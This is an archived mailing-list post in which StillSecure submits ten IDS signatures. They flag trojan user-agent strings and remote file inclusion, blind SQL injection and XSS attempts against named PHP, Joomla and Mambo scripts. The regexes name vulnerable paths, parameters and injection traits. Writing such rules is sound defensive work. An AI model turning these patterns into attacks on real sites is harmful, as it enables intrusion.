[Emerging-Sigs] StillSecure: 10 New Signatures - October 14th, 2011

signatures signatures at stillsecure.com
Fri Oct 14 07:10:52 EDT 2011


Hi Matt,

Please find the 10 signatures below,

1. VIRUS Suspicious user-agent string (Se2011)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"VIRUS Suspicious user-agent string (Se2011)"; flow:established,to_server; content:"|0d 0a|User-Agent|3a| Se2011"; classtype:trojan-activity; reference:url,threatexpert.com/report.aspx?md5=ed1ad8a8ff2357b1665055ac01b2df14; sid:14101; rev:1;)

2. VIRUS Suspicious user-agent string (GPRecover)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"VIRUS Suspicious user-agent string (GPRecover)"; flow:established,to_server; content:"|0d 0a|User-Agent|3a| GPRecover"; classtype:trojan-activity; reference:url,virustotal.com/file-scan/report.html?id=9524777b79c1e5ead00906f3d19c8714be5dba144bd3978adb2b05252fa0c739-1300934042; sid:14102; rev:1;)

3. VIRUS suspicious useragent string EjUpdate
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"VIRUS suspicious useragent string EjUpdate"; flow:established,to_server; content:"|0d 0a|User-Agent|3A 20|EjUpdate"; classtype:trojan-activity; reference:url,threatexpert.com/report.aspx?md5=7bd56e44af2ea2267bf8de2bb98101ff; sid:1110111;rev:1;)

4. WEB-PHP ShowTopKB.php script Remote File inclusion Attempt
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP ShowTopKB.php script Remote File inclusion Attempt"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/includes/pages/ShowTopKB.php?"; nocase; uricontent:"ReportID="; nocase; pcre:"/ReportID=\s*(ftps?|https?|php)\:\//Ui"; classtype:web-application-attack; reference:url,packetstormsecurity.org/files/view/105668/2moons-rfi.txt; sid:1110113; rev:1;) 

5. WEB-PHP Smarty.class.php script Remote File inclusion Attempt 
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Smarty.class.php script Remote File inclusion Attempt"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/includes/libs/Smarty/Smarty.class.php?"; nocase; uricontent:"file="; nocase; pcre:"/file=\s*(ftps?|https?|php)\:\//Ui"; classtype:web-application-attack; reference:url,packetstormsecurity.org/files/view/105668/2moons-rfi.txt; sid:1110114; rev:1;) 

6. WEB-PHP ShowModVersionPage.php script Remote File inclusion Attempt 
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP ShowModVersionPage.php script Remote File inclusion Attempt"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/includes/pages/adm/ShowModVersionPage.php?"; nocase; uricontent:"File="; nocase; pcre:"/file=\s*(ftps?|https?|php)\:\//Ui"; classtype:web-application-attack; reference:url,packetstormsecurity.org/files/view/105668/2moons-rfi.txt; sid:1110115; rev:1;) 

7. WEB-PHP smarty_internal_resource_php.php script Remote File inclusion Attempt 
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP smarty_internal_resource_php.php script Remote File inclusion Attempt"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/includes/libs/Smarty/sysplugins/smarty_internal_resource_php.php?"; nocase; uricontent:"_smarty_template="; nocase; pcre:"/_smarty_template=\s*(ftps?|https?|php)\:\//Ui"; classtype:web-application-attack; reference:url,packetstormsecurity.org/files/view/105668/2moons-rfi.txt; sid:1110116; rev:1;) 

8. WEB-PHP smarty_internal_templatecompilerbase.php script Remote File inclusion Attempt 
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP smarty_internal_templatecompilerbase.php script Remote File inclusion Attempt"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/includes/libs/Smarty/sysplugins/smarty_internal_templatecompilerbase.php?"; nocase; uricontent:"file="; nocase; pcre:"/file=\s*(ftps?|https?|php)\:\//Ui"; classtype:web-application-attack; reference:url,packetstormsecurity.org/files/view/105668/2moons-rfi.txt; sid:1110117; rev:1;)

9. WEB-PHP Joomla component CalcBuilder Blind SQL Injection Attempt
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Joomla component CalcBuilder Blind SQL Injection Attempt"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/index.php?"; nocase; uricontent:"option=com_calcbuilder"; nocase; uricontent:"controller=calcbuilder"; nocase; uricontent:"id="; nocase; uricontent:"and"; nocase; uricontent:"substring"; nocase; pcre:"/and.*substring\(/Ui"; classtype:web-application-attack; reference:url,packetstormsecurity.org/files/view/102435/joomlacalcbuilder-sql.txt; sid:1210112; rev:1;)

10. WEB-PHP Mambo component N-Namskeid XSS Vulnerability
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Mambo component N-Namskeid XSS Vulnerability"; flow:established,to_server; uricontent:"/index.php?"; nocase; uricontent:"option=com_n-namskeid"; nocase; uricontent:"do="; nocase; pcre:"/do\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D)/Ui"; classtype:web-application-attack; reference:url,packetstormsecurity.org/files/view/104690/mambonnamskeid-xss.txt; sid:1310111; rev:1;)

Looking forward your comments if any.

Thanks & Regards,
StillSecure

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20111014/b5b6417d/attachment.html


More information about the Emerging-sigs mailing list